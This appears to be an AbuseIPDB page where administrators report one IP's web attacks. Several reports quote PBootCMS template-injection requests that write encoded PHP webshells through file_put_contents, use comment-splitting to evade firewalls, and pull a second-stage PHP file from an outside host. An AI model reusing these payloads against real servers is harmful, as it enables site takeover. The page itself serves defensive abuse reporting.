File probing, /wp, /wordpress, /wp-admin/setup-config.php, /wp-admin/install.php, etc. without user ...
show moreFile probing, /wp, /wordpress, /wp-admin/setup-config.php, /wp-admin/install.php, etc. without user agent string ([06/Jun/2025:02:25:38 +0200] "GET /wp-admin/install.php HTTP/1.1" 301 259 "-" "-")
show less
It performs multiple requests sending a large hexadecimal string "WW91cmJveTg5Li5ib29sPD9waHAKQHNlc3 ...
show moreIt performs multiple requests sending a large hexadecimal string "WW91cmJveTg5Li5ib29sPD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBhc3M9J3Bhc3MnOwokcGF5bG9hZE5hbWU9J3BheWxvYWQnOwoka2V5PSczYzZlMGI4YTljMTUyMjRhJzsKaWYgKGlzc2V0KCRfUE9TVFskcGFzc10pKXsKICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOwogICAgaW... Once decoded, it's PHP. There's a sort of signature too (Yourboy89..bool). Supposedly this targets PBootCMS vulnerabilities.
show less
Performs a series of requests, eg. "GET /{pboot:if((\"f\"./*FUCKYOUWAF*/\"i\"./*FUCKYOUWAF*/\"l\"./* ...
show morePerforms a series of requests, eg. "GET /{pboot:if((\"f\"./*FUCKYOUWAF*/\"i\"./*FUCKYOUWAF*/\"l\"./*FUCKYOUWAF*/\"e\"./*FUCKYOUWAF*/\"_\"./*FUCKYOUWAF*/\"p\"./*FUCKYOUWAF*/\"u\"./*FUCKYOUWAF*/\"t\"./*FUCKYOUWAF*/\"_\"./*FUCKYOUWAF*/\"c\"./*FUCKYOUWAF*/\"o\"./*FUCKYOUWAF*/\"n\"./*FUCKYOUWAF*/\"t\"./*FUCKYOUWAF*/\"e\"./*FUCKYOUWAF*/\"n\"./*FUCKYOUWAF*/\"t\"./*FUCKYOUWAF*/\"s\")(\"./static/upload/image//ff.php\",(\"base6\".\"4_decode\")(\"WW91cmJveTg5Li5ib29sPD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yK...
Maybe it is searching for vulnerabilities of PBootCms.
show less
Performs 913 requests in 3 minutes, searching for single files, some located in standard WP paths (e ...
show morePerforms 913 requests in 3 minutes, searching for single files, some located in standard WP paths (eg. plugins), other in standard server paths (eg. /.well-known/). Every request it changes the user agent string (mostly oudated Firefox and Chrome browsers)
show less
Performs GET requests like "GET /{pboot:if((\"f\"./*FUCKYOUWAF*/\"i\"./*FUCKYOUWAF*/\"l\"./*FUCKYOUW ...
show morePerforms GET requests like "GET /{pboot:if((\"f\"./*FUCKYOUWAF*/\"i\"./*FUCKYOUWAF*/\"l\"./*FUCKYOUWAF*/\"e\"./*FUCKYOUWAF*/\"_\"./*FUCKYOUWAF*/\"p\"./*FUCKYOUWAF*/\"u\"./*FUCKYOUWAF*/\"t\"./*FUCKYOUWAF*/\"_\"./*FUCKYOUWAF*/\"c\"./*FUCKYOUWAF*/\"o\"./*FUCKYOUWAF*/\"n\"./*FUCKYOUWAF*/\"t\"./*FUCKYOUWAF*/\"e\"./*FUCKYOUWAF*/\"n\"./*FUCKYOUWAF*/\"t\"./*FUCKYOUWAF*/\"s\")(\"./runtime/cache/aa.php\",(\"base6\".\"4_decode\")(\"PD9waHAgJE8wME9PMD11cmxkZWNvZGUoIiU3OCUzNCU2MyU2RiUyRi..."
It tries to download a file from www.sunstonejet.com/css/6.zip (not a real zip file: it is an 85 kb PHP file). Maybe the target is a PBootCMS installation.
show less
It performs multiple requests (GET /?p=1, /?p=2, /?p=n), appending &test= to the query string. The c ...
show moreIt performs multiple requests (GET /?p=1, /?p=2, /?p=n), appending &test= to the query string. The content of test is something like
}{pboot:if((\"var_\".\"dump\")((\"file\".\"_put_contents\")(\"./static/upload/image/login2.php/\",(\"hex2bi\".\"n\")(\"3c3f70687020244f30304f4f303d75726c6465636f646528222537382533342536332536462532462537302533392537392537312536452536342532442536432537322536422536342536372535462536352536382536332537332537372536462532422536362533332533...
The hexadecimal part, once decoded, reveals PHP code that tries to download a file from www.sunstonejet.com/css/404.zip The zip file is NOT a real zip file: it is an HTML/PHP mix. Requests are not always the same (content of test can vary). The only common thing is Python-urllib/3.12 as the software to execute requests.
I suppose this is targeting a CMS called PBoot, looking for vulnerabilities.
show less
Web App Attack
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.